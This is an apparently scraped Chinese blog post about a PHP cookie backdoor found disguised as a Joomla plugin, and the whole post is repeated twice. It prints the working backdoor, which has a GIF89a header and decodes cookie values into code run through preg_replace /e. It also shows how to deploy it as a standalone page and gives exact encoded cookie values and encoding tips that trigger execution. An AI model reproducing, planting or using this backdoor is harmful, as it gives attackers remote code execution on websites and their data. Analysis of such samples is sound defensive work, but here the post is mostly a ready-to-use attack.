php -- cookie 后门
2014-05-09 10:34
495 查看
4000
ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002 http://www.freebuf.com/articles/web/33275.html
[php] view
plaincopy
GIF89a
<?php
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}
利用上述部分代码建立页面bk-001.php,
[php] view
plaincopy
<?php
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
?>
发送下列cookie值,
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();
有写朋友可能喜欢使用Linux下的base64程序, 例如:
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码([b]phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.[/b]
ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002 http://www.freebuf.com/articles/web/33275.html
[php] view
plaincopy
GIF89a
<?php
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}
利用上述部分代码建立页面bk-001.php,
[php] view
plaincopy
<?php
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
?>
发送下列cookie值,
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();
有写朋友可能喜欢使用Linux下的base64程序, 例如:
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码([b]phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.[/b]
相关文章推荐
- php -- cookie 后门
- PHP 跨域写cookie
- 编写基于PHP扩展库的后门
- PHP Session和Cookie,Session阻塞,Session垃圾回收
- PHP - Manual手册 - CII. Network Functions网络函数 - setcookie发送一个cookie
- 深入理解PHP中的Session和Cookie
- 彻底杜绝PHP的session,cookie,Cannot modify header错误
- PHP中的cookie
- 又一款超强PHP后门
- PHP入门教程之会话控制技巧(cookie与session)
- PHP日记——Lavarel操作cookie和session
- PHP setcookie指定domain参数后,在IE下设置cookie失效的解决方法
- PHP实现cookie浏览历史纪录
- [李景山php]每天TP5-20161230|thinkphp5-Cookie.php
- php cookie 作用范围–不要在当前页面使用你的cookie
- php 从Header中获取cookie
- PHP安全编程:留心后门URL
- PHP学习SELECT postgresql正则表达式 cookie同一站点IP访问和域名访问 T检验
- JS&PHP&mysql/不用cookie实现用户收藏功能的小demo
- php cookie和session的代码操作